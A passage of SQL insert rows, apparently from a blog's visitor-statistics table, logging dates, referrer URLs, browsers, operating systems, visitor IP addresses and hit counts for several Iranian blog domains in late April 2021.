(11015,'2021-04-23','http://82.102.9.14:80/blog','Firefox','Windows','6.0',NULL,NULL,'','114.113.145.25','000',0,1,0),
(11016,'2021-04-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(11017,'2021-04-23','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','13.209.28.104','000',0,1,0),
(11018,'2021-04-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','104.237.140.169','000',0,1,0),
(11019,'2021-04-23','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','52.192.73.251','000',0,6,0),
(11020,'2021-04-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.173.157.251','000',0,1,0),
(11021,'2021-04-23','https://cn.bing.com/','Firefox','Windows','10.0',NULL,NULL,'','27.17.52.252','000',0,2,0),
(11022,'2021-04-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.64.64','000',0,1,0),
(11023,'2021-04-23','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(11024,'2021-04-23','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','107.175.36.216','000',0,2,0),
(11025,'2021-04-23','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.27','000',0,3,0),
(11026,'2021-04-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(11027,'2021-04-23','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','184.94.240.92','000',0,7,0),
(11028,'2021-04-23','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','18.231.94.162','000',0,6,0),
(11029,'2021-04-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.163.250.237','000',0,1,0),
(11030,'2021-04-23','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','35.178.16.1','000',0,6,0),
(11031,'2021-04-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.211.194','000',0,1,0),
(11032,'2021-04-23','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','79.106.211.37','000',0,1,0),
(11033,'2021-04-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.213.78','000',0,1,0),
(11034,'2021-04-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.95.45','000',0,1,0),
(11035,'2021-04-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(11036,'2021-04-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(11037,'2021-04-23','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','163.172.70.215','000',0,3,0),
(11038,'2021-04-23','http://ictbank.ir/blog','Safari','OS X','10.15.6',NULL,NULL,'','79.127.96.129','000',0,1,0),
(11039,'2021-04-23','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','176.176.108.164','000',0,1,0),
(11040,'2021-04-24','http://ictbank.ir/blog','Safari','OS X','10.15.6',NULL,NULL,'','5.113.156.168','000',0,2,0),
(11041,'2021-04-24','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.175','000',0,1,0),
(11042,'2021-04-24','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.27','000',0,3,0),
(11043,'2021-04-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','107.151.182.54','000',0,2,0),
(11044,'2021-04-24','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','82.223.16.107','000',0,1,0),
(11045,'2021-04-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.157.123','000',0,1,0),
(11046,'2021-04-24','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','6.3',NULL,NULL,'','92.204.174.134','000',0,2,0),
(11047,'2021-04-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.187.218.207','000',0,1,0),
(11048,'2021-04-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(11049,'2021-04-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.162.101.62','000',0,1,0),
(11050,'2021-04-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.217.204','000',0,1,0),
(11051,'2021-04-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.213.78','000',0,1,0),
(11052,'2021-04-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(11053,'2021-04-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(11054,'2021-04-24','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','45.83.65.64','000',0,1,0),
(11055,'2021-04-24','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.154','000',0,1,0),
(11056,'2021-04-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.207.136.33','000',0,1,0),
(11057,'2021-04-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.3.146.243','000',0,1,0),
(11058,'2021-04-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(11059,'2021-04-24','https://duckduckgo.com/','Firefox','Fedora','Unknown',NULL,NULL,'','203.221.42.176','000',0,1,0),
(11060,'2021-04-24','https://www.google.com.ar/','Chrome','Linux','Unknown',NULL,NULL,'','181.167.32.83','000',0,1,0),
(11061,'2021-04-25','http://ictbank.ir/blog','Chrome','OS X','10.15.4',NULL,NULL,'','54.194.181.89','000',0,1,0),
(11062,'2021-04-25','http://ictbank.ir/blog','Firefox','Fedora','Unknown',NULL,NULL,'','203.221.42.176','000',0,2,0),
(11063,'2021-04-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.106.30.100','000',0,2,0),
(11064,'2021-04-25','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.27','000',0,6,0),
(11065,'2021-04-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','107.151.182.58','000',0,1,0),
(11066,'2021-04-25','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','192.99.18.108','000',0,1,0),
(11067,'2021-04-25','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','177.125.60.23','000',0,1,0),
(11068,'2021-04-25','http://ictbank.ir/blog','Opera','Linux','Unknown',NULL,NULL,'','51.77.52.160','000',0,1,0),
(11069,'2021-04-25','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(11070,'2021-04-25','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','10.0',NULL,NULL,'','195.154.185.157','000',0,2,0),
(11071,'2021-04-25','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','118.208.17.67','000',0,1,0),
(11072,'2021-04-25','http://ictbank.ir/blog','Safari','OS X','10.15.6',NULL,NULL,'','5.112.233.232','000',0,2,0),
(11073,'2021-04-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.235.72','000',0,1,0),
(11074,'2021-04-25','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.134.244.155','000',0,1,0),
(11075,'2021-04-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.101','000',0,4,0),
(11076,'2021-04-25','https://duckduckgo.com/','Firefox','Windows','10.0',NULL,NULL,'','142.134.146.223','000',0,1,0),
(11077,'2021-04-25','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','192.99.18.136','000',0,1,0),
(11078,'2021-04-25','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.14','000',0,1,0),
(11079,'2021-04-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.131.24','000',0,1,0),
(11080,'2021-04-25','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','54.213.71.187','000',0,1,0),
(11081,'2021-04-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(11082,'2021-04-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.95.45','000',0,1,0),
(11083,'2021-04-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(11084,'2021-04-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(11085,'2021-04-25','http://design-arena.ir/blog','Unknown','Android','10',NULL,NULL,'','42.192.184.76','000',0,2,0),
(11086,'2021-04-25','http://ictbank.ir/blog','Unknown','Windows','5.1',NULL,NULL,'','94.130.167.248','000',0,1,0),
(11087,'2021-04-25','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','6.1',NULL,NULL,'','92.204.174.134','000',0,2,0),
(11088,'2021-04-26','https://www.google.com/','Chrome','Fedora','Unknown',NULL,NULL,'','187.85.15.253','000',0,1,0),
(11089,'2021-04-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','113.218.244.248','000',0,1,0),
(11090,'2021-04-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','112.101.130.232','000',0,2,0),
(11091,'2021-04-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','222.241.209.151','000',0,1,0),
(11092,'2021-04-26','http://ictbank.ir/blog','Chrome','OS X','10.15.4',NULL,NULL,'','188.40.113.31','000',0,1,0),
(11093,'2021-04-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','1.70.98.188','000',0,1,0),
(11094,'2021-04-26','http://ictbank.ir/blog','Android Browser','Android','6.0',NULL,NULL,'','61.147.15.66','000',0,6,0),
(11095,'2021-04-26','http://ictbank.ir/blog','Android Browser','Android','6.0',NULL,NULL,'','61.147.15.67','000',0,8,0),
(11096,'2021-04-26','http://design-arena.ir/blog','Unknown','Android','10',NULL,NULL,'','81.69.191.124','000',0,1,0),
(11097,'2021-04-26','http://design-arena.ir/blog','Unknown','Android','10',NULL,NULL,'','121.5.109.55','000',0,1,0),
(11098,'2021-04-26','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(11099,'2021-04-26','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','80.92.206.251','000',0,1,0),
(11100,'2021-04-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.133.1.233','000',0,1,0),
(11101,'2021-04-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','121.238.49.201','000',0,1,0),
(11102,'2021-04-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','120.86.39.56','000',0,1,0),
(11103,'2021-04-26','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,1,0),
(11104,'2021-04-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.245.144.228','000',0,1,0),
(11105,'2021-04-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.146','000',0,2,0),
(11106,'2021-04-26','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.27','000',0,3,0),
(11107,'2021-04-26','http://ictbank.ir/blog','Safari','iOS','9.1',NULL,NULL,'','171.34.176.57','000',0,1,0),
(11108,'2021-04-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','107.151.182.54','000',0,1,0),
(11109,'2021-04-26','http://ictbank.ir/blog','Android Browser','Android','2.0',NULL,NULL,'','220.181.77.162','000',0,6,0),
(11110,'2021-04-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.245.74.169','000',0,1,0),
(11111,'2021-04-26','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','92.87.29.204','000',0,2,0),
(11112,'2021-04-26','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','18.215.124.80','000',0,1,0),
(11113,'2021-04-26','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.16','000',0,1,0),
(11114,'2021-04-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(11115,'2021-04-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.128.254.37','000',0,1,0),
(11116,'2021-04-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.11.114','000',0,1,0),
(11117,'2021-04-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(11118,'2021-04-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(11119,'2021-04-26','http://ictbank.ir/blog','Chrome','Chrome OS','Unknown',NULL,NULL,'','185.220.100.252','000',0,1,0),
(11120,'2021-04-26','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','199.249.230.71','000',0,2,0),
(11121,'2021-04-26','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','162.247.74.206','000',0,3,0),
(11122,'2021-04-26','http://ictbank.ir/blog','Chrome','OS X','10.7.5',NULL,NULL,'','162.247.74.216','000',0,3,0),
(11123,'2021-04-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.82.216.14','000',0,6,0),
(11124,'2021-04-26','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','10.0',NULL,NULL,'','92.204.174.134','000',0,2,0),
(11125,'2021-04-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','136.185.6.226','000',0,21,0),
(11126,'2021-04-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','136.185.6.226','000',0,35,0),
(11127,'2021-04-27','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','184.94.240.92','000',0,1,0),
(11128,'2021-04-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','80.92.206.251','000',0,1,0),
(11129,'2021-04-27','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','81.180.84.246','000',0,2,0),
(11130,'2021-04-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(11131,'2021-04-27','http://ictbank.ir/blog','Safari','OS X','10.15.6',NULL,NULL,'','5.113.67.203','000',0,5,0),
(11132,'2021-04-27','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(11133,'2021-04-27','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','23.100.232.233','000',0,1,0),
(11134,'2021-04-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.133.3','000',0,1,0),
(11135,'2021-04-27','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','185.100.87.251','000',0,3,0),
(11136,'2021-04-27','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','171.25.193.25','000',0,3,0),
(11137,'2021-04-27','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','109.70.100.37','000',0,1,0),
(11138,'2021-04-27','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','198.73.50.66','000',0,2,0),
(11139,'2021-04-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.82.216.14','000',0,12,0),
(11140,'2021-04-27','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','199.47.67.32','000',0,1,0),
(11141,'2021-04-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.187.191.250','000',0,1,0),
(11142,'2021-04-27','http://ictbank.ir/blog','Chrome','OS X','10.7.5',NULL,NULL,'','185.220.103.9','000',0,2,0),
(11143,'2021-04-27','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','185.220.100.250','000',0,1,0),
(11144,'2021-04-27','http://ictbank.ir/blog','Chrome','Windows','6.4',NULL,NULL,'','185.100.87.202','000',0,1,0),
(11145,'2021-04-27','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','185.220.100.253','000',0,2,0),
(11146,'2021-04-27','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','45.93.80.231','000',0,3,0),
(11147,'2021-04-27','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','85.203.15.35','000',0,2,0),
(11148,'2021-04-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.211.194','000',0,1,0),
(11149,'2021-04-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.128.254.37','000',0,1,0),
(11150,'2021-04-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(11151,'2021-04-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(11152,'2021-04-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(11153,'2021-04-27','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','163.172.70.88','000',0,1,0),
(11154,'2021-04-27','http://www.google.com/','Chrome','Android','10',NULL,NULL,'','46.53.254.44','000',0,1,0),
(11155,'2021-04-27','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','6.1',NULL,NULL,'','195.154.185.157','000',0,2,0),
(11156,'2021-04-27','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.27','000',0,3,0),
(11157,'2021-04-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.3.146.243','000',0,1,0),
(11158,'2021-04-28','http://82.102.9.14/blog','Internet Explorer','Windows','Unknown',NULL,NULL,'','199.195.252.133','000',0,1,0),
(11159,'2021-04-28','https://www.google.co.jp/','Safari','iOS','10.3.3',NULL,NULL,'','106.181.90.9','000',0,1,0),
(11160,'2021-04-28','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','172.245.113.198','000',0,10,0),
(11161,'2021-04-28','http://design-arena.ir/blog','Firefox','iOS','12.1',NULL,NULL,'','162.55.58.42','000',0,1,0),
(11162,'2021-04-28','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','184.94.240.92','000',0,3,0),
(11163,'2021-04-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(11164,'2021-04-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.223.64','000',0,1,0),
(11165,'2021-04-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.187.1','000',0,1,0),
(11166,'2021-04-28','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.27','000',0,3,0),
(11167,'2021-04-28','http://www.google.com/','Chrome','Android','10',NULL,NULL,'','39.43.68.39','000',0,1,0),
(11168,'2021-04-28','http://design-arena.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','206.189.117.9','000',0,1,0),
(11169,'2021-04-28','https://www.google.com/','Safari','OS X','10.15.6',NULL,NULL,'','109.252.191.16','000',0,1,0),
(11170,'2021-04-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.217.204','000',0,1,0),
(11171,'2021-04-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,2,0),
(11172,'2021-04-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(11173,'2021-04-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.244.42.15','000',0,1,0),
(11174,'2021-04-28','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','199.244.88.132','000',0,2,0),
(11175,'2021-04-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','176.31.182.56','000',0,2,0),
(11176,'2021-04-29','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','107.23.81.97','000',0,1,0),
(11177,'2021-04-29','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(11178,'2021-04-29','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','172.245.242.246','000',0,2,0),
(11179,'2021-04-29','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','116.203.43.255','000',0,1,0),
(11180,'2021-04-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.203.21.46','000',0,1,0),
(11181,'2021-04-29','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','198.98.52.143','000',0,3,0),
(11182,'2021-04-29','http://ictbank.ir/blog','Internet Explorer','Windows','6.0',NULL,NULL,'','45.153.160.131','000',0,3,0),
(11183,'2021-04-29','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','185.220.100.249','000',0,3,0),
(11184,'2021-04-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.82.216.14','000',0,6,0),
(11185,'2021-04-29','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','217.12.221.2','000',0,1,0),
(11186,'2021-04-29','https://www.google.ru/','Yandex Browser','Windows','10.0',NULL,NULL,'','77.232.4.82','000',0,4,0),
(11187,'2021-04-29','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.84','000',0,3,0),
(11188,'2021-04-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.211.106.38','000',0,1,0),
(11189,'2021-04-29','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','102.128.141.108','000',0,2,0),
(11190,'2021-04-29','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.14','000',0,1,0),
(11191,'2021-04-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.244.42.15','000',0,1,0),
(11192,'2021-04-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.213.78','000',0,1,0),
(11193,'2021-04-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,2,0),
(11194,'2021-04-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(11195,'2021-04-29','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','179.218.12.93','000',0,1,0),
(11196,'2021-04-30','http://ictbank.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','41.191.227.170','000',0,2,0),
(11197,'2021-04-30','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','179.60.150.45','000',0,1,0),
(11198,'2021-04-30','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,1,0),
(11199,'2021-04-30','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','45.79.187.56','000',0,1,0),
(11200,'2021-04-30','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.84','000',0,6,0),
(11201,'2021-04-30','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','178.217.186.71','000',0,2,0),
(11202,'2021-04-30','http://mail.design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','103.111.34.14','000',0,2,0),
(11203,'2021-04-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','107.151.182.62','000',0,1,0),
(11204,'2021-04-30','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','142.93.37.52','000',0,1,0),
(11205,'2021-04-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.245.219.37','000',0,1,0),
(11206,'2021-04-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(11207,'2021-04-30','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','86.237.78.177','000',0,1,0),
(11208,'2021-04-30','http://design-arena.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','168.119.229.248','000',0,3,0),
(11209,'2021-04-30','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','107.174.226.183','000',0,2,0),
(11210,'2021-04-30','http://ictbank.ir/blog','Firefox','Fedora','Unknown',NULL,NULL,'','188.69.232.164','000',0,1,0),
(11211,'2021-04-30','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','188.130.138.242','000',0,2,0),
(11212,'2021-04-30','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(11213,'2021-04-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.6.214','000',0,1,0),
(11214,'2021-04-30','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','193.46.255.64','000',0,1,0),
(11215,'2021-04-30','http://82.102.9.14/blog','Unknown','Android','10',NULL,NULL,'','121.4.163.148','000',0,1,0),
(11216,'2021-04-30','https://www.google.com/','Opera Mobile','Android','6.0.1',NULL,NULL,'','82.145.223.13','000',0,1,0),
(11217,'2021-04-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','39.101.140.2','000',0,1,0),
(11218,'2021-04-30','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','36.156.141.156','000',0,1,0),
(11219,'2021-04-30','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','100.21.218.158','000',0,1,0),
(11220,'2021-04-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.11.114','000',0,1,0),
(11221,'2021-04-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(11222,'2021-04-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(11223,'2021-04-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(11224,'2021-04-30','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.210.92.175','000',0,1,0),
(11225,'2021-04-30','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.14','000',0,1,0),
(11226,'2021-04-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,1,0),
(11227,'2021-04-30','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','156.193.72.223','000',0,1,0),
(11228,'2021-04-30','http://mail.design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','177.106.128.54','000',0,2,0),
(11229,'2021-05-01','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','85.216.124.176','000',0,2,0),
(11230,'2021-05-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,1,0),
(11231,'2021-05-01','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','54.189.230.128','000',0,1,0),
(11232,'2021-05-01','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','54.203.73.198','000',0,1,0),
(11233,'2021-05-01','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.138','000',0,1,0),
(11234,'2021-05-01','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','100.21.218.158','000',0,1,0),
(11235,'2021-05-01','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.175','000',0,1,0),
(11236,'2021-05-01','https://google.com','Chrome','Linux','Unknown',NULL,NULL,'','89.248.168.140','000',0,2,0),
(11237,'2021-05-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.166.239.249','000',0,1,0),
(11238,'2021-05-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.101','000',0,4,0),
(11239,'2021-05-01','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','23.94.103.106','000',0,2,0),
